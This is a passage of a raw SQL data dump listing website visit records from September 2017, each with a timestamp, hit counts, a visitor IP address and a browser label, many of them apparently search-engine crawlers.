22,1,1,0,0,'51.255.65.73','other'),(156230,1505309383,1,1,0,0,'141.8.183.1','other'),(156231,1505309561,1,1,0,0,'91.196.178.136','firefox'),(156232,1505310018,1,1,0,0,'62.80.190.170','firefox'),(156233,1505310032,1,1,0,0,'217.182.132.75','other'),(156234,1505310388,1,1,0,0,'51.255.65.64','other'),(156235,1505310649,1,1,0,0,'51.255.71.121','other'),(156236,1505310716,2,2,0,0,'141.8.142.21','other'),(156237,1505310974,1,1,0,0,'91.196.178.66','firefox'),(156238,1505311046,1,1,0,0,'217.69.133.9','other'),(156239,1505311048,1,1,0,0,'207.46.13.71','other'),(156240,1505311448,1,1,0,0,'62.80.190.170','firefox'),(156241,1505311459,1,1,0,0,'51.255.71.100','other'),(156242,1505311602,1,1,0,0,'51.255.65.54','other'),(156243,1505311626,1,1,0,0,'51.255.65.9','other'),(156244,1505311767,1,1,0,0,'51.255.65.40','other'),(156245,1505311814,1,1,0,0,'51.255.71.123','other'),(156246,1505311835,1,1,0,0,'141.8.142.21','other'),(156247,1505311937,1,1,0,0,'51.255.65.75','other'),(156248,1505312127,1,1,0,0,'51.255.65.70','other'),(156249,1505312702,1,1,0,0,'217.182.132.175','other'),(156250,1505313072,1,1,0,0,'91.196.178.65','firefox'),(156251,1505313126,1,0,1,0,'66.249.76.108',''),(156252,1505313258,1,1,0,0,'217.182.132.32','other'),(156253,1505313344,1,1,0,0,'217.182.132.6','other'),(156254,1505313429,1,1,0,0,'137.74.207.110','other'),(156255,1505313560,1,1,0,0,'91.196.178.162','chrome'),(156256,1505313600,1,0,1,0,'66.249.76.89',''),(156257,1505314013,1,1,0,0,'51.255.65.61','other'),(156258,1505314355,1,1,0,0,'51.255.65.16','other'),(156259,1505315126,1,1,0,0,'164.132.162.157','other'),(156260,1505315160,3,3,0,0,'141.8.183.1','other'),(156261,1505315252,1,1,0,0,'8.29.198.26','other'),(156262,1505315820,1,1,0,0,'107.167.116.23','opera'),(156263,1505315842,1,1,0,0,'217.182.132.19','other'),(156264,1505316037,1,1,0,0,'51.255.65.95','other'),(156265,1505316092,1,1,0,0,'5.45.207.64','other'),(156266,1505316225,1,1,0,0,'217.182.132.14','other'),(156267,1505316582,1,1,0,0,'51.255.65.63','other'),(156268,1505316913,1,1,0,0,'51.255.65.41','other'),(156269,1505317387,1,1,0,0,'217.182.132.7','other'),(156270,1505317804,1,1,0,0,'217.182.132.240','other'),(156271,1505318308,1,1,0,0,'141.8.183.1','other'),(156272,1505318396,1,1,0,0,'51.255.65.3','other'),(156273,1505318712,3,3,0,0,'5.45.207.64','other'),(156274,1505318781,1,1,0,0,'137.74.207.110','other'),(156275,1505318799,1,1,0,0,'141.8.142.21','other'),(156276,1505318880,1,1,0,0,'217.182.132.173','other'),(156277,1505319881,1,0,1,0,'66.249.66.199',''),(156278,1505320021,1,1,0,0,'51.255.65.59','other'),(156279,1505320038,1,1,0,0,'46.161.9.39','chrome'),(156280,1505320107,1,0,1,0,'66.249.76.108',''),(156281,1505320920,1,1,0,0,'217.182.132.148','other'),(156282,1505321068,1,1,0,0,'180.76.15.15','other'),(156283,1505321194,1,1,0,0,'51.255.65.50','other'),(156284,1505321393,4,4,0,0,'91.209.11.236','other'),(156285,1505321475,1,1,0,0,'141.8.183.1','other'),(156286,1505321520,1,1,0,0,'217.182.132.95','other'),(156287,1505321946,2,2,0,0,'5.45.207.64','other'),(156288,1505322237,1,1,0,0,'51.255.65.18','other'),(156289,1505322989,1,1,0,0,'91.196.178.135','chrome'),(156290,1505323048,1,1,0,0,'51.255.65.67','other'),(156291,1505323425,1,1,0,0,'137.74.203.194','other'),(156292,1505323524,1,1,0,0,'141.8.183.1','other'),(156293,1505323546,1,1,0,0,'51.255.71.114','other'),(156294,1505323605,1,1,0,0,'217.182.132.70','other'),(156295,1505323699,1,1,0,0,'217.182.132.31','other'),(156296,1505323935,1,1,0,0,'66.249.76.109','chrome'),(156297,1505323937,1,1,0,0,'66.249.76.107','chrome'),(156298,1505323982,1,1,0,0,'91.209.11.236','other'),(156299,1505324088,1,1,0,0,'107.167.108.202','opera'),(156300,1505324114,1,1,0,0,'91.196.178.36','chrome'),(156301,1505324217,1,1,0,0,'51.255.65.22','other'),(156302,1505324294,4,4,0,0,'5.45.207.64','other'),(156303,1505324385,1,1,0,0,'217.182.132.36','other'),(156304,1505324740,1,1,0,0,'66.249.66.201','chrome'),(156305,1505324762,1,1,0,0,'66.249.76.89','chrome'),(156306,1505325034,1,0,1,0,'66.249.66.76',''),(156307,1505325076,1,1,0,0,'141.8.183.1','other'),(156308,1505325199,1,0,1,0,'66.249.76.93',''),(156309,1505325490,1,1,0,0,'37.73.250.154','chrome'),(156310,1505325660,2,2,0,0,'91.209.11.236','other'),(156311,1505325756,1,1,0,0,'5.45.207.64','other'),(156312,1505326084,1,1,0,0,'8.29.198.26','other'),(156313,1505326122,1,1,0,0,'107.167.108.202','opera'),(156314,1505326212,1,1,0,0,'141.8.183.1','other'),(156315,1505326454,1,1,0,0,'178.255.215.94','other'),(156316,1505326705,1,1,0,0,'164.132.162.157','other'),(156317,1505326721,5,5,0,0,'192.99.203.35','other'),(156318,1505326772,2,2,0,0,'5.45.207.64','other'),(156319,1505326996,1,0,1,0,'66.249.76.109',''),(156320,1505327145,1,1,0,0,'207.46.13.71','other'),(156321,1505327153,1,1,0,0,'91.209.11.236','other'),(156322,1505327417,1,1,0,0,'217.182.132.56','other'),(156323,1505327505,1,1,0,0,'217.182.132.23','other'),(156324,1505328151,1,1,0,0,'217.182.132.147','other'),(156325,1505328453,1,1,0,0,'164.132.162.164','other'),(156326,1505328655,1,1,0,0,'107.167.107.214','opera'),(156327,1505329052,1,0,1,0,'66.249.76.108',''),(156328,1505329343,1,1,0,0,'91.209.11.236','other'),(156329,1505329625,1,1,0,0,'107.167.106.164','opera'),(156330,1505329725,1,1,0,0,'176.122.100.69','chrome'),(156331,1505329924,1,1,0,0,'51.255.65.76','other'),(156332,1505330173,1,1,0,0,'141.8.142.21','other'),(156333,1505330177,1,1,0,0,'107.167.107.214','opera'),(156334,1505330622,2,2,0,0,'141.8.183.1','other'),(156335,1505330845,2,2,0,0,'5.45.207.64','other'),(156336,1505331281,1,1,0,0,'91.209.11.236','other'),(156337,1505331460,1,1,0,0,'51.255.71.119','other'),(156338,1505331482,1,1,0,0,'95.132.0.203','chrome'),(156339,1505331502,1,1,0,0,'217.182.132.154','other'),(156340,1505331806,1,1,0,0,'5.45.207.64','other'),(156341,1505332288,1,1,0,0,'141.8.142.21','other'),(156342,1505332508,5,5,0,0,'141.8.183.1','other'),(156343,1505332672,1,1,0,0,'164.132.162.160','other'),(156344,1505332681,1,1,0,0,'91.209.11.236','other'),(156345,1505332696,1,1,0,0,'51.255.65.70','other'),(156346,1505332872,1,1,0,0,'217.182.132.88','other'),(156347,1505333037,1,1,0,0,'40.77.167.86','other'),(156348,1505333115,2,2,0,0,'5.45.207.64','other'),(156349,1505334509,1,1,0,0,'216.145.17.190','firefox'),(156350,1505334545,2,2,0,0,'5.45.207.64','other'),(156351,1505334782,1,1,0,0,'91.209.11.236','other'),(156352,1505334869,1,1,0,0,'51.255.65.34','other'),(156353,1505334970,1,1,0,0,'213.180.203.32','other'),(156354,1505335164,2,2,0,0,'141.8.183.1','other'),(156355,1505335178,1,1,0,0,'37.54.23.229','chrome'),(156356,1505335268,1,1,0,0,'217.182.132.73','other'),(156357,1505335827,1,1,0,0,'217.182.132.171','other'),(156358,1505336218,1,1,0,0,'164.132.164.180','other'),(156359,1505336275,1,1,0,0,'141.8.183.1','other'),(156360,1505336407,1,1,0,0,'91.209.11.236','other'),(156361,1505336466,1,1,0,0,'93.72.249.70','chrome'),(156362,1505336656,1,1,0,0,'51.255.65.88','other'),(156363,1505336914,1,1,0,0,'8.29.198.26','other'),(156364,1505337282,1,1,0,0,'141.8.183.1','other'),(156365,1505337698,1,1,0,0,'151.80.27.116','other'),(156366,1505337803,1,1,0,0,'91.209.11.236','other'),(156367,1505338056,1,1,0,0,'51.255.65.6','other'),(156368,1505338934,1,1,0,0,'141.8.142.21','other'),(156369,1505339219,2,2,0,0,'141.8.183.1','other'),(156370,1505339475,2,2,0,0,'54.165.59.7','other'),(156371,1505339812,1,1,0,0,'51.255.65.64','other'),(156372,1505340438,1,1,0,0,'217.182.132.86','other'),(156373,1505340733,1,1,0,0,'40.77.167.47','other'),(156374,1505340744,1,1,0,0,'217.182.132.19','other'),(156375,1505340897,1,1,0,0,'151.80.27.118','other'),(156376,1505340994,2,2,0,0,'5.45.207.64','other'),(156377,1505342203,1,1,0,0,'217.182.132.92','other'),(156378,1505342486,1,1,0,0,'51.255.65.16','other'),(156379,1505342491,1,1,0,0,'141.8.183.1','other'),(156380,1505342552,1,1,0,0,'66.249.66.195','chrome'),(156381,1505342591,1,1,0,0,'66.249.76.108','chrome'),(156382,1505343091,1,1,0,0,'5.45.207.64','other'),(156383,1505343188,1,1,0,0,'51.255.65.5','other'),(156384,1505345044,1,1,0,0,'157.55.39.192','other'),(156385,1505345198,1,1,0,0,'5.45.207.64','other'),(156386,1505345359,1,1,0,0,'51.255.65.26','other'),(156387,1505345855,1,1,0,0,'141.8.183.1','other'),(156388,1505345917,1,1,0,0,'51.255.65.49','other'),(156389,1505346163,1,1,0,0,'176.31.231.10','other'),(156390,1505347053,1,1,0,0,'141.8.183.1','other'),(156391,1505347447,1,1,0,0,'157.55.39.192','other'),(156392,1505347888,1,1,0,0,'8.29.198.26','other'),(156393,1505347925,1,1,0,0,'141.8.142.21','other'),(156394,1505348293,1,1,0,0,'91.209.11.236','other'),(156395,1505348307,1,1,0,0,'216.244.66.237','other'),(156396,1505349081,5,5,0,0,'5.45.207.64','other'),(156397,1505349720,1,1,0,0,'101.199.108.52','chrome'),(156398,1505349748,1,1,0,0,'106.120.162.111','chrome'),(156399,1505350512,3,3,0,0,'5.45.207.64','other'),(156400,1505351014,1,1,0,0,'195.238.108.89','chrome'),(156401,1505351312,1,1,0,0,'141.8.142.21','other'),(156402,1505353225,1,1,0,0,'95.108.181.63','other'),(156403,1505353798,1,1,0,0,'141.8.183.1','other'),(156404,1505354942,1,1,0,0,'5.45.207.64','other'),(156405,1505355787,1,1,0,0,'40.77.167.47','other'),(156406,1505356673,2,2,0,0,'5.45.207.64','other'),(156407,1505357386,1,0,1,0,'66.249.66.199',''),(156408,1505358221,1,1,0,0,'5.45.207.64','other'),(156409,1505358762,1,1,0,0,'8.29.198.27','other'),(156410,1505359553,1,1,0,0,'5.45.207.64','other'),(156411,1505360715,2,2,0,0,'5.45.207.64','other'),(156412,1505362860,1,1,0,0,'141.8.142.21','other'),(156413,1505362864,1,1,0,0,'5.45.207.64','other'),(156414,1505364923,1,1,0,0,'107.167.107.214','opera'),(156415,1505364951,1,1,0,0,'5.45.207.64','other'),(156416,1505366265,1,1,0,0,'40.77.167.47','other'),(156417,1505366280,1,1,0,0,'91.196.178.67','chrome'),(156418,1505367537,1,1,0,0,'141.8.183.1','other'),(156419,1505368917,1,1,0,0,'66.102.9.25','chrome'),(156420,1505369600,1,1,0,0,'8.29.198.25','other'),(156421,1505370061,1,1,0,0,'141.8.183.1','other'),(156422,1505370443,21,21,0,0,'154.16.138.15','other'),(156423,1505370722,2,2,0,0,'207.46.13.71','other'),(156424,1505370934,1,1,0,0,'5.45.207.64','other'),(156425,1505370983,2,2,0,0,'141.8.183.1','other'),(156426,1505371697,1,0,1,0,'66.249.76.91',''),(156427,1505372334,1,1,0,0,'91.196.178.70','firefox'),(156428,1505372556,1,1,0,0,'207.46.13.71','other'),(156429,1505372956,1,1,0,0,'141.8.183.1','other'),(156430,1505373310,1,1,0,0,'5.45.207.64','other'),(156431,1505373455,1,1,0,0,'91.196.177.46','chrome'),(156432,1505374412,1,1,0,0,'40.77.167.47','other'),(156433,1505374907,1,1,0,0,'207.46.13.71','other'),(156434,1505375063,2,2,0,0,'141.8.183.1','other'),(156435,1505376271,1,1,0,0,'46.133.78.198','chrome'),(156436,1505376465,1,1,0,0,'40.77.167.86','other'),(156437,1505376618,1,1,0,0,'178.94.29.189','chrome'),(156438,1505377381,1,1,0,0,'94.179.147.128','chrome'),(156439,1505377544,1,1,0,0,'54.165.59.7','other'),(156440,1505378346,1,1,0,0,'107.167.107.214','opera'),(156441,1505378981,1,1,0,0,'5.45.207.64','other'),(156442,1505379184,1,1,0,0,'217.69.133.2','other'),(156443,1505379705,1,1,0,0,'95.132.104.207','firefox'),(156444,1505380350,2,2,0,0,'141.8.183.1','other'),(156445,1505380433,1,1,0,0,'8.29.198.25','other'),(156446,1505381408,1,0,1,0,'66.249.76.107',''),(156447,1505381790,2,2,0,0,'5.45.207.64','other'),(156448,1505382032,1,1,0,0,'91.196.178.162','chrome'),(156449,1505383336,2,2,0,0,'91.196.177.15','chrome'),(156450,1505383387,1,1,0,0,'5.45.207.64','other'),(156451,1505385344,1,1,0,0,'180.76.15.145','other'),(156452,1505385460,1,1,0,0,'217.182.132.182','other'),(156453,1505385570,2,2,0,0,'91.209.11.236','other'),(156454,1505385979,1,1,0,0,'217.182.132.154','other'),(156455,1505386469,1,1,0,0,'40.77.167.86','other'),(156456,1505386567,1,1,0,0,'51.255.65.76','other'),(156457,1505386694,1,1,0,0,'217.182.132.37','other'),(156458,1505386981,1,1,0,0,'130.180.217.18','firefox'),(156459,1505387100,1,1,0,0,'5.45.207.64','other'),(156460,1505387309,1,1,0,0,'51.255.71.125','other'),(156461,1505387360,1,1,0,0,'91.196.178.136','firefox'),(156462,1505387372,1,1,0,0,'51.255.65.63','other'),(156463,1505387413,1,1,0,0,'51.255.65.69','other'),(156464,1505388249,1,1,0,0,'51.255.65.41','other'),(156465,1505388278,1,1,0,0,'217.182.132.84','other'),(156466,1505388343,1,1,0,0,'91.196.178.70','firefox'),(156467,1505388548,1,1,0,0,'217.182.132.75','other'),(156468,1505388735,1,1,0,0,'51.255.71.130','other'),(156469,1505388845,1,1,0,0,'95.132.11.168','chrome'),(156470,1505388849,1,1,0,0,'141.8.183.1','other'),(156471,1505389279,2,2,0,0,'5.45.207.64','other'),(156472,1505389337,1,1,0,0,'91.196.177.46','chrome'),(156473,1505390205,1,1,0,0,'91.196.178.67','firefox'),(156474,1505390372,1,1,0,0,'141.8.183.1','other'),(156475,1505390443,1,1,0,0,'51.255.65.96','other'),(156476,1505390519,1,1,0,0,'217.182.132.180','other'),(156477,1505390586,1,1,0,0,'51.255.65.61','other'),(156478,1505390841,1,1,0,0,'217.182.132.150','other'),(156479,1505391267,1,1,0,0,'8.29.198.26','other'),(156480,1505391368,1,1,0,0,'137.74.207.116','other'),(156481,1505391369,1,1,0,0,'91.196.178.67','firefox'),(156482,1505391388,1,1,0,0,'51.255.65.34','other'),(156483,1505391407,1,1,0,0,'91.209.11.236','other'),(156484,1505391463,34,34,0,0,'144.76.12.66','other'),(156485,1505391666,1,1,0,0,'95.132.11.168','chrome'),(156486,1505391864,1,1,0,0,'37.52.17.94','chrome'),(156487,1505392045,1,1,0,0,'217.182.132.53','other'),(156488,1505392413,1,1,0,0,'217.182.132.61','other'),(156489,1505392420,1,1,0,0,'51.255.65.72','other'),(156490,1505392576,1,1,0,0,'91.196.177.46','chrome'),(156491,1505392588,1,1,0,0,'85.115.62.180','other'),(156492,1505392632,1,1,0,0,'91.209.11.236','other'),(156493,1505392949,1,1,0,0,'5.45.207.64','other'),(156494,1505393207,1,1,0,0,'151.80.27.116','other'),(156495,1505393345,1,1,0,0,'141.8.183.1','other'),(156496,1505394165,1,0,1,0,'66.249.66.74',''),(156497,1505394279,1,1,0,0,'51.255.71.131','other'),(156498,1505395092,1,1,0,0,'51.255.65.37','other'),(156499,1505395432,1,1,0,0,'217.182.132.183','other'),(156500,1505395490,1,1,0,0,'141.8.142.21','other'),(156501,1505395521,1,1,0,0,'93.74.212.147','firefox'),(156502,1505395605,2,2,0,0,'91.209.11.236','other'),(156503,1505396047,1,1,0,0,'94.179.147.128','chrome'),(156504,1505396165,1,1,0,0,'178.93.4.165','chrome'),(156505,1505396660,1,1,0,0,'46.161.9.39','chrome'),(156506,1505396736,6,6,0,0,'167.114.219.41','other'),(156507,1505396916,1,1,0,0,'51.255.71.98','other'),(156508,1505396944,1,1,0,0,'91.209.11.236','other'),(156509,1505397040,1,1,0,0,'51.255.65.3','other'),(156510,1505397322,2,2,0,0,'91.196.178.132','chrome'),(156511,1505397500,1,1,0,0,'164.132.162.159','other'),(156512,1505397793,1,1,0,0,'217.182.132.91','other'),(156513,1505398172,1,1,0,0,'51.255.71.123','other'),(156514,1505398292,1,1,0,0,'217.182.132.155','other'),(156515,1505398421,1,1,0,0,'91.196.178.68','chrome'),(156516,1505398656,1,1,0,0,'51.255.71.132','other'),(156517,1505399111,1,1,0,0,'91.209.11.236','other'),(156518,1505399270,1,0,1,0,'66.249.76.108',''),(156519,1505399297,1,1,0,0,'141.8.183.1','other'),(156520,1505399454,1,1,0,0,'37.52.23.89','chrome'),(156521,1505401659,1,1,0,0,'141.8.183.1','other'),(156522,1505401832,2,2,0,0,'5.45.207.64','other'),(156523,1505402127,1,1,0,0,'8.29.198.27','other'),(156524,1505402368,1,1,0,0,'217.182.132.149','other'),(156525,1505402402,1,1,0,0,'141.8.142.21','other'),(156526,1505402595,9,9,0,0,'192.99.203.35','other'),(156527,1505402646,1,1,0,0,'217.182.132.96','other'),(156528,1505402657,1,1,0,0,'51.255.71.121','other'),(156529,1505402801,1,1,0,0,'51.255.65.68','other'),(156530,1505402860,1,1,0,0,'5.45.207.64','other'),(156531,1505402971,1,1,0,0,'51.255.65.47','other'),(156532,1505402999,1,1,0,0,'217.182.132.180','other'),(156533,1505403473,1,1,0,0,'217.182.132.19','other'),(156534,1505403722,1,1,0,0,'51.255.65.224','other'),(156535,1505403882,1,1,0,0,'91.196.178.69','firefox'),(156536,1505404026,1,1,0,0,'51.255.71.123','other'),(156537,1505404315,1,1,0,0,'217.182.132.58','other'),(156538,1505404513,1,1,0,0,'51.255.65.14','other'),(156539,1505404564,1,1,0,0,'217.182.132.51','other'),(156540,1505404887,1,1,0,0,'51.255.65.91','other'),(156541,1505405534,2,2,0,0,'5.45.207.64','other'),(156542,1505405540,1,1,0,0,'217.182.132.173','other'),(156543,1505406150,1,1,0,0,'217.69.133.2','other'),(156544,1505406267,1,1,0,0,'217.182.132.84','other'),(156545,1505406604,1,1,0,0,'217.182.132.177','other'),(156546,1505406834,1,1,0,0,'51.255.65.97','other'),(156547,1505407020,1,1,0,0,'5.45.207.64','other'),(156548,1505407063,1,1,0,0,'164.132.162.187','other'),(156549,1505407396,1,1,0,0,'91.196.178.38','chrome'),(156550,1505407645,3,3,0,0,'54.165.59.7','other'),(156551,1505408203,1,0,1,0,'66.249.76.89',''),(156552,1505408261,1,1,0,0,'91.209.11.236','other'),(156553,1505408448,1,1,0,0,'217.182.132.184','other'),(156554,1505408691,1,1,0,0,'178.154.171.75','other'),(156555,1505408777,1,1,0,0,'51.255.65.38','other'),(156556,1505408935,1,1,0,0,'217.182.132.192','other'),(156557,1505409069,1,1,0,0,'164.132.162.159','other'),(156558,1505409225,2,2,0,0,'5.45.207.64','other'),(156559,1505409276,1,1,0,0,'162.210.196.129','other'),(156560,1505409401,1,1,0,0,'51.255.65.58','other'),(156561,1505409422,1,1,0,0,'51.255.71.131','other'),(156562,1505409526,1,1,0,0,'51.255.71.123','other'),(156563,1505409717,1,1,0,0,'207.46.13.71','other'),(156564,1505409991,1,1,0,0,'178.154.171.75','other'),(156565,1505410145,1,1,0,0,'217.182.132.95','other'),(156566,1505410743,1,1,0,0,'217.182.132.68','other'),(156567,1505410994,1,1,0,0,'5.45.207.64','other'),(156568,1505411001,2,2,0,0,'5.45.207.9','other'),(156569,1505411670,1,1,0,0,'51.255.65.79','other'),(156570,1505412000,1,1,0,0,'217.182.132.191','other'),(156571,1505412020,1,1,0,0,'178.154.171.75','other'),(156572,1505412447,1,1,0,0,'51.255.65.14','other'),(156573,1505412662,1,1,0,0,'5.45.207.64','other'),(156574,1505412726,1,1,0,0,'217.182.132.157','other'),(156575,1505412911,1,1,0,0,'91.209.11.236','other'),(156576,1505412970,1,1,0,0,'8.29.198.27','other'),(156577,1505413270,1,1,0,0,'51.255.65.32','other'),(156578,1505413335,1,1,0,0,'51.255.65.40','other'),(156579,1505413516,1,1,0,0,'51.255.65.58','other'),(156580,1505413532,1,1,0,0,'51.255.65.73','other'),(156581,1505413579,1,1,0,0,'5.45.207.64','other'),(156582,1505415003,2,2,0,0,'5.45.207.64','other'),(156583,1505415223,1,1,0,0,'46.211.144.40','chrome'),(156584,1505415575,1,1,0,0,'40.77.167.86','other'),(156585,1505415879,1,1,0,0,'164.132.162.164','other'),(156586,1505415910,1,1,0,0,'217.182.132.85','other'),(156587,1505416652,1,1,0,0,'217.182.132.91','other'),(156588,1505416810,1,1,0,0,'91.209.11.236','other'),(156589,1505416853,1,1,0,0,'178.154.171.75','other'),(156590,1505416976,2,2,0,0,'5.45.207.64','other'),(156591,1505417008,1,1,0,0,'217.182.132.156','other'),(156592,1505417117,1,1,0,0,'51.255.71.132','other'),(156593,1505417205,1,1,0,0,'217.182.132.37','other'),(156594,1505417371,1,1,0,0,'5.45.207.9','other'),(156595,1505417530,1,1,0,0,'180.76.15.145','other'),(156596,1505417914,1,1,0,0,'51.255.65.61','other'),(156597,1505418506,3,3,0,0,'5.45.207.64','other'),(156598,1505418749,1,1,0,0,'51.255.65.38','other'),(156599,1505419029,1,1,0,0,'51.255.66.102','other'),(156600,1505419344,1,1,0,0,'91.209.11.236','other'),(156601,1505419700,1,1,0,0,'51.255.65.58','other'),(156602,1505420042,1,1,0,0,'178.154.171.75','other'),(156603,1505420565,1,1,0,0,'91.209.11.236','other'),(156604,1505420687,1,1,0,0,'51.255.65.91','other'),(156605,1505420813,1,0,1,0,'66.249.66.201',''),(156606,1505420815,1,1,0,0,'51.255.71.110','other'),(156607,1505421090,1,0,1,0,'66.249.76.107',''),(156608,1505421369,1,1,0,0,'217.182.132.146','other'),(156609,1505421579,1,1,0,0,'207.46.13.71','other'),(156610,1505421632,1,1,0,0,'164.132.162.158','other'),(156611,1505421819,1,1,0,0,'5.45.207.9','other'),(156612,1505421870,1,1,0,0,'91.209.11.236','other'),(156613,1505422960,1,1,0,0,'91.196.178.166','chrome'),(156614,1505422985,1,1,0,0,'217.182.132.94','other'),(156615,1505423813,1,1,0,0,'8.29.198.25','other'),(156616,1505424015,2,2,0,0,'5.45.207.64','other'),(156617,1505424103,1,1,0,0,'217.182.132.63','other'),(156618,1505424295,1,1,0,0,'51.255.65.19','other'),(156619,1505424539,1,1,0,0,'217.182.132.62','other'),(156620,1505425250,1,1,0,0,'164.132.162.188','other'),(156621,1505425290,1,1,0,0,'164.132.162.164','other'),(156622,1505425770,1,0,1,0,'68.180.228.221',''),(156623,1505425806,1,1,0,0,'217.182.132.55','other'),(156624,1505425860,1,1,0,0,'5.45.207.9','other'),(156625,1505425895,1,1,0,0,'217.182.132.75','other'),(156626,1505426351,1,1,0,0,'51.255.65.67','other'),(156627,1505426532,1,1,0,0,'51.255.65.3','other'),(156628,1505427254,1,1,0,0,'91.209.11.236','other'),(156629,1505427273,1,1,0,0,'51.255.65.22','other'),(156630,1505427305,1,1,0,0,'5.45.207.12','other'),(156631,1505427473,1,1,0,0,'141.8.142.91','other'),(156632,1505428228,1,1,0,0,'51.255.65.15','other'),(156633,1505428550,1,1,0,0,'217.182.132.23','other'),(156634,1505429217,1,1,0,0,'217.69.133.5','other'),(156635,1505430341,1,1,0,0,'217.182.132.72','other'),(156636,1505430468,1,1,0,0,'217.182.132.86','other'),(156637,1505430486,1,1,0,0,'51.255.65.50','other'),(156638,1505430781,1,1,0,0,'51.255.64.106','other'),(156639,1505430941,1,1,0,0,'137.74.207.159','other'),(156640,1505431396,1,1,0,0,'217.182.132.156','other'),(156641,1505431785,1,1,0,0,'180.76.15.137','other'),(156642,1505432009,1,1,0,0,'162.210.196.98','other'),(156643,1505432125,1,1,0,0,'51.255.65.72','other'),(156644,1505433157,1,1,0,0,'51.255.65.84','other'),(156645,1505433172,1,1,0,0,'217.182.132.94','other'),(156646,1505433207,1,1,0,0,'217.182.132.57','other'),(156647,1505433509,1,0,1,0,'66.249.76.109',''),(156648,1505433783,1,1,0,0,'217.182.132.181','other'),(156649,1505434445,1,1,0,0,'217.182.132.80','other'),(156650,1505434661,1,1,0,0,'8.29.198.25','other'),(156651,1505435534,1,1,0,0,'217.182.132.151','other'),(156652,1505435929,1,1,0,0,'137.74.207.102','other'),(156653,1505436218,1,1,0,0,'51.255.65.23','other'),(156654,1505436280,1,1,0,0,'51.255.65.48','other'),(156655,1505436296,1,1,0,0,'217.182.132.33','other'),(156656,1505436645,1,1,0,0,'217.182.132.31','other'),(156657,1505436661,1,1,0,0,'51.255.71.110','other'),(156658,1505436731,1,1,0,0,'51.255.71.128','other'),(156659,1505437135,1,1,0,0,'137.74.201.99','other'),(156660,1505437755,1,1,0,0,'51.255.71.128','other'),(156661,1505437922,1,1,0,0,'217.182.132.32','other'),(156662,1505438213,1,1,0,0,'180.76.15.152','other'),(156663,1505439286,1,1,0,0,'217.182.132.30','other'),(156664,1505439421,1,1,0,0,'217.182.132.65','other'),(156665,1505439930,1,1,0,0,'164.132.162.160','other'),(156666,1505440165,1,0,1,0,'66.249.76.93',''),(156667,1505440414,1,1,0,0,'164.132.162.159','other'),(156668,1505440447,1,0,1,0,'66.249.66.76',''),(156669,1505440458,2,0,2,0,'66.249.76.89',''),(156670,1505440460,1,0,1,0,'66.249.76.91',''),(156671,1505441158,1,1,0,0,'51.255.65.81','other'),(156672,1505441369,1,1,0,0,'207.46.13.71','other'),(156673,1505442119,1,1,0,0,'217.182.132.5','other'),(156674,1505442651,1,1,0,0,'51.255.65.53','other'),(156675,1505442698,1,1,0,0,'51.255.65.44','other'),(156676,1505442857,1,1,0,0,'217.182.132.190','other'),(156677,1505442992,1,1,0,0,'207.46.13.71','other'),(156678,1505443444,1,1,0,0,'217.182.132.174','other'),(156679,1505443681,1,1,0,0,'66.249.76.93','chrome'),(156680,1505444095,2,2,0,0,'69.30.221.250','other'),(156681,1505444103,1,0,1,0,'66.249.76.91',''),(156682,1505444109,1,1,0,0,'217.69.133.217','other'),(156683,1505444864,1,1,0,0,'141.8.142.21','other'),(156684,1505444916,1,1,0,0,'51.255.65.48','other'),(156685,1505445141,1,1,0,0,'51.255.65.51','other'),(156686,1505445522,1,1,0,0,'8.29.198.25','other'),(156687,1505445556,2,2,0,0,'91.209.11.236','other'),(156688,1505446607,1,1,0,0,'51.255.65.6','other'),(156689,1505446973,2,2,0,0,'5.45.207.64','other'),(156690,1505447328,1,1,0,0,'180.76.15.144','other'),(156691,1505447403,1,1,0,0,'217.182.132.154','other'),(156692,1505447652,1,1,0,0,'217.69.133.6','other'),(156693,1505448323,1,1,0,0,'137.74.201.100','other'),(156694,1505449387,1,1,0,0,'5.45.207.64','other'),(156695,1505449577,1,1,0,0,'51.255.71.118','other'),(156696,1505449629,2,2,0,0,'141.8.183.1','other'),(156697,1505450880,1,1,0,0,'141.8.183.1','other'),(156698,1505450899,1,1,0,0,'51.255.65.27','other'),(156699,1505451207,1,1,0,0,'217.182.132.35','other'),(156700,1505451299,1,1,0,0,'217.182.132.7','other'),(156701,1505451380,1,1,0,0,'5.45.207.64','other'),(156702,1505451532,1,1,0,0,'51.255.65.16','other'),(156703,1505451781,1,1,0,0,'91.196.178.67','firefox'),(156704,1505452180,1,1,0,0,'107.167.106.11','opera'),(156705,1505452257,1,1,0,0,'40.77.167.46','other'),(156706,1505452631,2,2,0,0,'91.209.11.236','other'),(156707,1505453111,1,1,0,0,'51.255.65.4','other'),(156708,1505453222,1,1,0,0,'66.102.9.29','chrome'),(156709,1505453570,1,1,0,0,'91.209.11.236','other'),(156710,1505453885,2,2,0,0,'141.8.183.1','other'),(156711,1505453997,2,2,0,0,'141.8.142.21','other'),(156712,1505454046,1,1,0,0,'51.255.65.29','other'),(156713,1505454056,1,1,0,0,'185.137.18.86','chrome'),(156714,1505454092,1,1,0,0,'217.182.132.78','other'),(156715,1505454144,1,1,0,0,'95.132.40.246','other'),(156716,1505454202,1,1,0,0,'51.255.65.55','other'),(156717,1505454261,1,1,0,0,'51.255.65.92','other'),(156718,1505454352,1,1,0,0,'51.255.65.9','other'),(156719,1505454492,1,1,0,0,'91.196.178.67','firefox'),(156720,1505454597,1,1,0,0,'91.196.178.70','chrome'),(156721,1505455756,1,1,0,0,'164.132.162.155','other'),(156722,1505455791,1,0,1,0,'66.249.66.199',''),(156723,1505455865,1,1,0,0,'91.196.178.67','chrome'),(156724,1505456152,1,1,0,0,'51.255.65.59','other'),(156725,1505456369,1,1,0,0,'8.29.198.27','other'),(156726,1505456420,2,2,0,0,'141.8.183.1','other'),(156727,1505456498,1,1,0,0,'51.255.71.115','other'),(156728,1505456810,1,1,0,0,'5.45.207.64','other'),(156729,1505456893,1,1,0,0,'141.8.142.21','other'),(156730,1505457143,1,1,0,0,'157.55.39.192','other'),(156731,1505457515,1,1,0,0,'217.182.132.82','other'),(156732,1505457812,1,1,0,0,'66.249.76.93','chrome'),(156733,1505457877,1,1,0,0,'51.255.65.79','other'),(156734,1505457994,1,1,0,0,'137.74.201.99','other'),(156735,1505458196,1,0,1,0,'66.249.66.76',''),(156736,1505458704,1,1,0,0,'217.182.132.28','other'),(156737,1505459195,1,1,0,0,'107.167.106.11','opera'),(156738,1505459285,64,64,0,0,'5.9.89.170','other'),(156739,1505459351,1,1,0,0,'91.196.178.131','chrome'),(156740,1505459361,1,1,0,0,'137.74.207.119','other'),(156741,1505459388,1,1,0,0,'91.197.217.11','other'),(156742,1505459471,1,1,0,0,